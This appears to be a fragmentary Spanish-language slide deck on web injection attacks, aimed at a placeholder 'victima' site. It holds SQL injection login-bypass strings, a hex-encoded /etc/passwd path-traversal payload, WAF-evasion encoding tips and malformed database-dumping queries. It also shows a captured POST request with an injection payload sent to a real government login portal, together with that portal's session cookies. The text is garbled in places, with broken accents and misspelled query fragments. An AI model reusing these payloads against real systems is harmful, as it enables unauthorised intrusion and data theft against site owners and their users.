Professional Documents
Culture Documents
Inyectar AQUI !!
Inyectar AQUI !!
www.victima.com/index.php?idVulnerable=34
GET
POST
XSS
RFI
LDAP
Command Injection
LFI
Hexencode
2f2a2a2f6574632f7061737377642f2a2a2f
/**/**/etc/passwd/**/**/ /**/**/etc/**/**/passwd/**/**/
http://www.string-functions.com/
Host=portal2.edomex.gob.mx User-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=es-MX,es-ES;q=0.8,es-AR;q=0.7,es;q=0.5,enUS;q=0.3,en;q=0.2 Accept-Encoding=gzip, deflate Referer=http://portal2.edomex.gob.mx/idcprod/idcplg?IdcService=LOGIN&Action= GetTemplatePage&Page=HOME_PAGE&Auth=Internet Cookie=__utma=26329020.1898314859.1361471024.1361478811.1362458074.3; __utmz=26329020.1361478811.2.2.utmcsr=busquedas.edomex.gob.mx|utmccn=(r eferral)|utmcmd=referral|utmcct=/search/query/browse.jsp; HstCfa704590=1362458074082; HstCla704590=1362458074082; HstCmu704590=1362458074082; HstPn704590=1; HstPt704590=1; HstCnv704590=1; HstCns704590=1; BIGipServerpool_ContentManager_80=3355970058.20480.0000; BIGipServerpool_PortalWebcacheNuevo_7777=1762265610.24862.0000 Content-Length=199 POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or 1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcServi ce%3DLOGIN%26Action%3DGetTemplatePage%26Page%3DHOME_PAGE%2 6Auth%3DInternet&edit=Login
LOGGIN BY PASS!!
Para pasarnos un loggin Se utiliza la sentencia OR ya que esta significa que si algo es verdadero entonces todo ser verdadero OR 1=1 . Esto provocar que automticamente toda la consulta sea verdadera, sea cual sea el usuario.
1.- V or V = VERDADERO-------------------- OR 1=1 /* 2.- V or F = VERDADERO-------------------- OR 1=0 /* 3.- F or V = VERDADERO-------------------- OR 0=1 /* 4.- F or F = FALSO----------------------------- OR 0=0 /*
LOGGIN BY PASS!!
admin - admin # admin /* or 1=1- or 1=1# or 1=0/* ) or 1=0 1=1- ) or 1=1 (1=1 - ) */ 1=0 #
WAF
Detectando WAF
Char Encode
til para evadir deteccin de palabras El atacante sabe que existen filtros que evitara la llegada de la inyeccin al servidor, el usara una combinacin de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
Char-doble encode
Cifra en Hexadecimal, til cuando la aplicacin emplea Url encode
Char-Unicode Encode
Cifrando con el estndar Unicode
Dumpleando la BD
Este ataque se genera cuando mandamos una consulta MAL formada, de tal manera que cuando el servidor la interprete cause un conflicto interno o Se confunda
Id?=66+Union,concat(0x3,slep(10000000),0x3) */#-')OR'#1='2--
#Select+from,-'(#')-- OR +FROM--